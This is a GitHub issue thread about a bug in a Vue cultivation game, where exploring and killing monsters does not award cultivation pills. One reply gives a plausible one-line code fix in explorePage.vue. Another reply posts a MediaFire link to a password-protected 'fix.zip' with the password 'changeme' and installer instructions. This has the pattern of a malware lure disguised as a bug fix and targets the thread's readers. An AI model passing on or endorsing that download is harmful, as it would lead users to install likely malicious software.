### ISSUE TITLE
[BUG反馈]探索中的培养丹收获有错误

### ISSUE THREAD

**Issue by san-tian** [setube/vue-XiuXianGame#24]
**BUG描述**
在探索中杀死怪物并不会收获培养丹。
**存档数据**

**Comment by PiaoR** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Yz-Crazy** [comment]
在 src/views/explorePage.vue 中的 this.player.cultivateDan 修改为this.player.props.cultivateDan 就可以了
